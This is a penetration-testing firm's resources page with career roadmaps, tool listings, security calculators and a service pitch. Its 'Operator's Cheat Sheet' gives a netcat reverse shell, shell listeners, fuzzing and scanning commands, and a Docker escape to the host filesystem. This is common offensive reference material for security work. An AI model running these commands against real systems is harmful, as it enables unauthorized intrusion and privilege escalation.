RadiumFox Logo
RADIUMFOXSecurity
RadiumFox Labs

The Armory.

Open-source tools, calculators, and intelligence resources built by our offensive security labs.

Featured Toolv2.4.0

RadiumScan

Our proprietary, open-source reconnaissance framework designed for deep asset discovery and vulnerability mapping. Built for red teams, by red teams.

View Resource

Security Learning Paths

Whether you're breaking in or locking down, we've curated the essential roadmaps for your career.

Red Team Operator

Master the art of adversarial simulation. Learn to think like an attacker to better defend your organization.

Key Milestones

  • Master Linux & Networking Fundamentals
  • Learn Scripting (Python, Bash, PowerShell)
  • Understand Vulnerability Scanning & Enumeration
  • Practice Exploitation & Privilege Escalation
  • Study Active Directory Attacks
  • Learn C2 Infrastructure & Evasion

Essential Tools

Kali LinuxMetasploitCobalt StrikeBloodHound

Blue Team Defender

Become a guardian of digital assets. Focus on detection, incident response, and threat hunting.

Key Milestones

  • Understand SIEM & Log Analysis
  • Learn Network Traffic Analysis (Wireshark)
  • Master Endpoint Detection & Response (EDR)
  • Study Malware Analysis & Reverse Engineering
  • Practice Incident Response Playbooks
  • Learn Threat Intelligence Platforms

Essential Tools

SplunkWiresharkSuricataVelociraptor

Compliance Auditor

Navigate the complex landscape of regulatory frameworks. Ensure organizations meet security standards.

Key Milestones

  • Study Major Frameworks (SOC 2, ISO 27001)
  • Learn Risk Assessment Methodologies
  • Understand Control Mapping & Gap Analysis
  • Master Policy Writing & Documentation
  • Study Cloud Compliance (AWS/Azure)
  • Learn Third-Party Risk Management

Essential Tools

DrataVantaKnowBe4Jira

The RadiumFox Arsenal

Explore the specialized tools and technologies we leverage to secure your infrastructure. Select a category to see exactly how we apply each tool in our engagements.

Tool Categories

5 Categories Found

RECON

Network Reconnaissance

Tools for mapping attack surfaces and identifying active assets.

Tool NameHow We Use It

Nmap

The industry standard for network discovery and security auditing.

We use Nmap for initial port scanning, service version detection, and OS fingerprinting to map the target network topology.

Masscan

The fastest Internet port scanner, capable of scanning the entire Internet in under 6 minutes.

Used for large-scale external perimeter scanning to quickly identify open ports across massive IP ranges before detailed enumeration.

OWASP Amass

In-depth DNS enumeration and network mapping tool.

We leverage Amass to discover subdomains and map the external attack surface by correlating data from open-source intelligence (OSINT) sources.

Interactive Intelligence

Real-time widgets to assess your security posture.

Breach Cost Estimator

Based on 2024 industry averages

$10M
5,000
Estimated Impact
$0

Methodology & Assumptions

This estimate is derived from the 2024 Cost of a Data Breach Report. It combines two primary factors:

1. Lost Business Cost: Estimated at 0.5% of annual revenue due to downtime and reputation damage.
2. Per-Record Cost: Calculated at $150 per compromised record (regulatory fines, notification, credit monitoring).

Note: This is a baseline estimate. Actual costs varies by industry and response time.

Password Entropy

Visual strength analyzer

Entropy ScoreEnter Password

Methodology

This calculator estimates entropy based on character set size (N) and password length (L) using the formula E = L * log2(N).

Strength Tiers:

  • Weak (< 40 bits): Crackable instantly by modern GPUs.
  • Moderate (40-80 bits): Crackable within days/weeks by a dedicated cluster.
  • Strong (> 80 bits): Resistant to brute-force attacks for decades.

Operator's Cheat Sheet

Quick reference commands for the field. Copy, paste, execute.

Nmap Scanning

Standard enumeration scan with scripts and version detection
nmap -sC -sV -oA output <target>
Fast full-port scan
nmap -p- --min-rate 1000 <target>
Top 100 UDP ports scan
nmap -sU --top-ports 100 <target>
Scan for known vulnerabilities using NSE
nmap --script vuln <target>

FFUF Fuzzing

Basic directory brute-forcing
ffuf -w wordlist.txt -u http://target/FUZZ
Subdomain enumeration via Host header
ffuf -w subdomains.txt -u http://target -H 'Host: FUZZ.target.com'
Fuzzing with file extensions
ffuf -w wordlist.txt -u http://target/FUZZ -e .php,.html,.txt

Netcat / Socat

Start a listener on port 4444
nc -lvnp 4444
Reverse shell (Linux)
nc -e /bin/bash <ip> <port>
Stabilized Socat listener
socat file:`tty`,raw,echo=0 tcp-listen:4444

Docker Security

Escape to host filesystem via volume mount
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Inspect all container volumes
docker ps --quiet | xargs docker inspect --format '{{ .Id }}: Volumes={{ .Mounts }}'

Knowledge Base

Tool

RadiumScan

Source15 MB
View Resource
Tool

Nmap

BinaryN/A
View Resource
Tool

Burp Suite Pro

BinaryN/A
View Resource
Tool

Cobalt Strike

BinaryN/A
View Resource
Tool

Metasploit Framework

BinaryN/A
View Resource
Tool

BloodHound

BinaryN/A
View Resource
Tool

Volatility

BinaryN/A
View Resource
Tool

Autopsy

BinaryN/A
View Resource
Tool

Aircrack-ng

BinaryN/A
View Resource
Tool

Kismet

BinaryN/A
View Resource
Tool

OWASP Amass

BinaryN/A
View Resource
Tool

Masscan

BinaryN/A
View Resource
Tool

ffuf

BinaryN/A
View Resource
Tool

OWASP ZAP

BinaryN/A
View Resource
Whitepaper

Active Directory Hardening Guide

PDF2.4 KB
View Resource
Cheatsheet

Common Ports & Services Cheatsheet

PDF1.1 KB
View Resource
Wordlist

Radium-Wordlist-2024

TXT450 B
View Resource
Whitepaper

Cloud Security Misconfigurations

PDF3.2 KB
View Resource
Cheatsheet

SQL Injection Payloads

TXT800 B
View Resource
Wordlist

Subdomain Enumeration List

TXT120 B
View Resource

Open Source Activity

Live contributions from our research labs.

View Profile
Recent Commits

[radium-scan]feat(scanner): added multi-threading support for port scan

Authored by jordan-radium

2h ago

[exploit-db-mirror]fix: resolved buffer overflow in payload generator

Authored by sarah-sec

5h ago

[radium-scan]docs: updated installation guide for linux

Authored by alex-ops

1d ago

[internal-tools]chore: dependency updates

Authored by bot-dependabot

2d ago

Join Us. Cut Costs.
Focus on What Matters.

Unlock high-impact penetration testing that drives real security gains. Led by experts, tailored for results, and designed to stay budget-friendly.

1

Submit Info

Share your environment, scope, or compliance needs via our quick form.

2

Senior Review

A lead RadiumFox engineer reviews and tailors your assessment—no junior handoffs.

3

Optional Scoping Call

We'll clarify priorities and technical details if needed.

4

Clear Quote

Expect a fixed-cost proposal—no hidden fees or fluff.

5

Fast Kickoff

Once approved, most projects launch within 5–7 business days with full support.